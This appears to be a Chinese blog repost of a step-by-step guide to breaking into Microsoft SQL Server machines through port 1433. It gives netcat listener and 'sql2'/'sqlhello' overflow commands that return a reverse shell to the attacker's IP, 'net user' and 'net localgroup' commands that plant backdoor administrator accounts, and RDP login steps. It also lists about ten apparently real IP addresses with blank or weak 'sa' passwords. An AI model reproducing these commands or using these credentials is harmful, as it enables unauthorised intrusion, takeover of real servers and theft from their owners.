【轉】1433埠入侵詳解
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
對sql的sp2及以下的系統,可用sql的hello 溢位漏洞入侵。
nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連線)
久違的溢位工具
用X-Scan對該站點的Server掃描結果出來了,開的埠還不少呢:53、80、1433、3389。可並沒有報告說發現有弱口令,看來網管還算比較有責任心。但開了3389埠,意味著可以遠端登入,這可是微軟給所有Windows使用者獻上的最大的“木馬”。
透過觀察,我發現只有在1433埠上下點工夫,想想辦法。何不用SQL2溢位工具試試?
先開一個cmd視窗,祭出寶刀netcat,在命令提示符下敲入“netcat -l -p 99”,監聽本地99埠。接著該SQL2出馬了。再開啟一個cmd視窗,鍵入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是對方IP,61.157.*.*是我自己的IP,回車後提示package sent successful。再回過頭去看看監聽本地埠的netcat,已經變成了C:\WinNT\system32\_,這就是對方機器的系統資料夾了, 看來是成功溢位了,就這麼簡單。
我很幸運地得到了對方的一個Shell,而且還是administrator許可權的。接下來的操作就輕車熟路了,新增使用者,提升許可權:在提示符 下鍵入“net user hacker 12345 /add”(在對方機器裡建立一個名為hacker,密碼為12345的使用者),再鍵入“net localgroup administrators hacker /add”(把使用者hacker加入到管理員組),接下來就該是3389遠端登入了。
首先執行Windows XP自帶遠端登入器mstsc.exe,填入對方的IP地址218.147.*.*,確定後在登入介面填上我剛建立的使用者名稱hacker和密碼12345,順利地進入了對方的Windows 2000桌面。
218.5.135.66 SQL-Server弱口令: "sa/1234"
218.14.115.111 SQL-Server弱口令: "sa/[空口令]"
218.12.38.52 SQL-Server弱口令: "sa/[空口令]"
218.12.97.14 SQL-Server弱口令: "sa/[空口令]"
218.6.242.228 SQL-Server弱口令: "sa/[空口令]"
222.100.119.3 SQL-Server弱口令: "sa/[空口令]"
222.105.67.200 SQL-Server弱口令: "sa/[空口令]"
222.105.28.130 SQL-Server弱口令: "sa/[空口令]"
222.106.60.51 SQL-Server弱口令: "sa/[空口令]"
222.117.107.1 SQL-Server弱口令: "sa/[空口令]"
在win2000機器上裝了mssql的話,機器就會開1433埠。什麼 什麼是埠?就象食堂買菜的視窗一樣,你買白菜上1號窗,買蕃茄上2號窗。在機器上買mssql就上1433埠。溢位1433需要兩個工具 nc.exe和sql2.exe。進攻方法就兩步,在自己機器上開一個cmd視窗。對了,你要用win2000的話就在開始-執行-鍵入cmd回車就成了 餓。這裡我們只用2000不說98。如果你把你的下的nc.exe和sql2.exe放在C:盤的話,就在你開的這個視窗打入命令c:>nc -1 -p 40回車。這步的意思是用nc這個工具開一個40的埠監聽。第二步:再在開始-執行-鍵入cmd灰塵,再開個視窗。在這個視窗寫入命令c:> sql2.exe你要入侵網站的ip和你自己的ip 40 0回車。這裡要作點說明:如何得到入侵網站的ip?在cmd下c:>ping 網址,就行了。自己的ip就不用我說了吧?算了還是說下吧,在cmd下鍵入ipconfig就可以了。其中命令列中的40你可以隨便改成別的,但好象40 和53的成功率高一點。再是命令中的0不性的話,你就試試1或2。如果入侵網站有這個漏洞的話,那麼你開的第一個視窗就會邊成肉雞的c:>winnt\ system32>.就是說,你已經進入它的機器裡了。進去以後,你可以新增個擁護了。net user guest /active:yes用這個命令,就將預設禁止的guest擁護激火。net user guest 123456這樣guest的密碼變成了123456了。net localgroup administrators guest /add這就是guest成為最高許可權的管理員了。
呵呵,基本就是這樣了,,,,
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/11411056/viewspace-734406/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- [提權禁區]1433埠入侵提權
- 【轉】21和80埠的入侵
- SQL Server預設1433埠修改方法SQLServer
- 入侵攻擊實戰中被利用的埠(轉)
- 利用135埠漏洞入侵個人電腦(轉)
- SQLSERVER為什麼不監聽1433埠SQLServer
- SSH遠端埠轉發實戰詳解
- 百度管家可能會佔用1433埠
- MSComm串列埠控制元件使用詳解(轉)串列埠控制元件
- 瞭解ASP入侵[收集總結](轉)
- 80埠入侵 CGI掃描器的原理和實現過程(轉)
- 網路-01-埠號-linux埠詳解大全Linux
- 一份詳盡的IPC$入侵資料 (轉)
- STM32 串列埠功能詳解串列埠
- 華為交換機埠安全詳解--埠隔離、環路檢測與埠安全
- 3389埠的入侵,Win Server2000 全拼輸入法漏洞(轉)Server
- Linux下串列埠通訊詳解(下)讀寫串列埠及關閉串列埠Linux串列埠
- 常見埠詳解(0-33600)
- 入侵思路講解
- 埠轉發工具Rinetd詳細入門教程
- websocket詳解(轉)Web
- NIS詳解(轉)
- grub詳解(轉)
- bash(詳解)(轉)
- classpath 詳解(轉)
- 用netstat -ano檢視本機埠詳解
- 詳解 Node.Js 中實現埠重用原理Node.js
- 詳解H3C交換機“埠安全”功能
- VC++串列埠通訊程式設計詳解C++串列埠程式設計
- 虛擬串列埠工具和串列埠除錯工具詳解 - 附下載地址串列埠除錯
- *NIX入侵檢測方法(轉)
- 網站入侵過程(轉)網站
- Linux入侵檢測(轉)Linux
- 埠大全(轉)
- 防患未然Juniper入侵防護系統解決方案(轉)
- ARP病毒入侵原理和安全性解決方案(轉)
- Dynamics CRM 安裝時SQL Server如何使用非標準埠(即非1433)來完成安裝SQLServer
- [轉]GitFlow詳解教程Git